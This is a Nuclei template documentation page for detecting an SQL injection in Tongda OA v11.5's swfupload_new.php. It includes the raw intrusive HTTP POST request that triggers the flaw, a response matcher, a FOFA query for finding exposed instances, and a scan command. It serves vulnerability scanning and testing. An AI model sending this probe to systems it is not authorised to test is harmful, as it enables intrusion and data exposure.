Skip to content
Nuclei Templates

Tongda OA v11.5 swfupload_new.php - SQL Injection

ID: tongda-oa-swfupload-sqli

Severity: high

Author: SleepingBag945

Tags: tongda,sqli,intrusive

Description

Section titled “Description”

There is a SQL injection vulnerability in the swfupload_new.php file of Tongda OA v11.5. An attacker can obtain sensitive information of the server through the vulnerability.

YAML Source

Section titled “YAML Source”
id: tongda-oa-swfupload-sqli


info:
  name: Tongda OA v11.5 swfupload_new.php - SQL Injection
  author: SleepingBag945
  severity: high
  description: |
    There is a SQL injection vulnerability in the swfupload_new.php file of Tongda OA v11.5. An attacker can obtain sensitive information of the server through the vulnerability.
  reference:
    - http://wiki.peiqi.tech/wiki/oa/通达OA/通达OA%20v11.5%20swfupload_new.php%20SQL注入漏洞.html
    - https://github.com/zan8in/afrog/blob/main/v2/pocs/afrog-pocs/vulnerability/tongda-swfupload-new-sql-inject.yaml
  metadata:
    verified: true
    max-request: 1
    fofa-query: app="TDXK-通达OA"
  tags: tongda,sqli,intrusive


http:
  - raw:
      - |
        POST /general/file_folder/swfupload_new.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: multipart/form-data; boundary=----------GFioQpMK0vv2
        Accept-Encoding: gzip


        ------------GFioQpMK0vv2
        Content-Disposition: form-data; name="ATTACHMENT_ID"


        1
        ------------GFioQpMK0vv2
        Content-Disposition: form-data; name="ATTACHMENT_NAME"


        1
        ------------GFioQpMK0vv2
        Content-Disposition: form-data; name="FILE_SORT"


        2
        ------------GFioQpMK0vv2
        Content-Disposition: form-data; name="SORT_ID"


        ------------GFioQpMK0vv2--


    matchers-condition: and
    matchers:
      - type: word
        words:
          - "insert into FILE_CONTENT("


      - type: status
        status:
          - 200
# digest: 4b0a0048304602210090be1fd39a7c986d39803c97b169a9a6c3d11d0832f51931011e3f844a967ab0022100edf5b5988b977fbe700bcc8ce1d3ee83bf2bf48e15ff804c42e4aa30c073d847:922c64590222798bb761d5b6d8e72950

Guide to check the vulnerabilities

Section titled “Guide to check the vulnerabilities”

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

Terminal window
$ nuclei -u "URL" -t "http/vulnerabilities/tongda/tongda-oa-swfupload-sqli.yaml"

View on Github